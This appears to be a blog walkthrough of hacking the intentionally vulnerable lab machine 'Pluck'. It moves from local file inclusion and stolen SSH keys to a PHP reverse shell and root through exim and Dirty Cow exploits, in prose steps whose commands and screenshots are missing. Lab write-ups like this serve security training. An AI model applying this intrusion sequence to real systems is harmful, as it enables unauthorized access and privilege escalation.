Wednesday, September 26, 2018



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Pluck.

- Pluck can be downloaded from here:,178/

- Once downloaded, extracted and imported with VirtualBox:


- Using netdiscover let's confirm that the IP is

- Scanning with nmap:

- Browsing the web server:

- nikto helps discovering a very promising LFI (Local File Inclusion) vulnerability at the web application:

- Let's check that LFI works, for instance reading /etc/passwd:

- From /etc/passwd we learn that there are users like bob, peter, paul, backup-user,  ..

- Also, reading the last line it seems that there is a script for performing backups::

- Taking advantage of the LFI to read the script

- The backup script informs us about three issues:

  • backups can be transferred with TFTP
  • the compressed backup file is located at /backups/backup.tar
  • both folders /home and /var/www/html are usually backup

- Obviously, our next goal must be to download backup.tar


3.1 - Local File Inclusion

- Trying to get backup.tar using the browser and taking advantage of the LFI is a little bit messy, due to the hugh size of the file:

- tftp does a better job:

- Also, curl would be a good alternative:

- Opening backup.tar:

- Now we have Pluck's backup folders available at our Kali machine:

- Searching for information inside bob and peter's home folders, there is nothing out of the ordinary:

- However we find a collection of 6 private and public keys inside paul's home folder:

- Checking what type of file are these keys, they are valid for SSH connections:

- Now,  we can use these keys with option -i identity_file to establish SSH conections:

- First attempt with id_key1 is unsuccessful:

- Same thing with id_key2 and id_key3:

- However, id_key4 leads to a Pdmenu:

- Pdmenu is a simple menu program that displays a menu from which the user can pick programs to run, for instance to edit files:

3.2 - Limited remote shell with PHP reverse shell

- Now, using the Pdmenu we are going to create remotely a file called myshell.php at /home/paul folder, just buy adapting the well-known PHP script php-reverse-shell.php to our needs:

- Editing remotely with Pdmenu the file /home/paul/myshell.php and copying into it the content of the local myshell.php:

- Let's notice that the text editor is vim, so we save the file with writing and quitting :wq! 

- Now, it is time to start the actual explotaition, first by setting a listening nc session, and second by running myshell.php with curl:

- The exploitation is successful and we get a limited remote shell:

3.3 - Limited remote shell with VIM and external commands

- As an alternative now we are going to use Pdmenu to insert the command /bin/bash in the Vim editor, following these directions:

- Just quitting Vim and Pdmenu comes back with a remote limited shell:


4.1 - Local Privilege Escalation with exim-4.84.7 exploit

- Finding the SUID files that exist on the system, we discover exim-4.84-7:

- Exim (current version 4.91) is an SMTP email message transfer agent (MTA) for use on Unix systems under GPL, similar in style to Smail 3

- Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument:

- There is a Local Privilege Escalation exploit related to this vulnerability:

- Copying the script to a new file

- Transferring from Kali to Pluck, specifically to /tmp folder:

- The transfer is successful, but has no execution permissions:

- Giving execution permissions to

- Running the script finally we get a remote root shell:

4.2 - Local Privilege Escalation with Dirty Cow Kernel Exploit

- An alternative to method explained at 4.1 would be to use this exploit: 

- Downloading to Kali:

- Transferring to Pluck:

- Compiling:

- Running cowroot we get a remote root shell:

- Apparently cowroot  destabilizes the system, so we follow these directions to achieve a more stable shell:


- Reading flag.txt: